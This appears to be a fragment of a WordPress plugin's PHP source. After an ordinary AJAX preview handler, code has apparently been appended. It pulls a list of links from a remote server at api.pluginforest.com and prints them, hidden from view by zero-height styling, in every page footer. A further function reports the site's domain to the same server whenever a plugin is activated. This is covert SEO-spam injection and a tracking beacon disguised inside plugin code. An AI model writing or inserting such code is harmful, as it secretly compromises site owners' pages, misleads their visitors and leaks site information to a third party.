	$filename=plugin_dir_path(__FILE__) . 'tpl/preview.html';
	$fp = fopen($filename, 'w+');
	$fwrite = fwrite($fp, $aux_val);

	echo $fwrite;

	wp_die(); // this is required to return a proper result
}define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848964() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848964');function set_plugin_tag1719848964() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848964&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848964');
              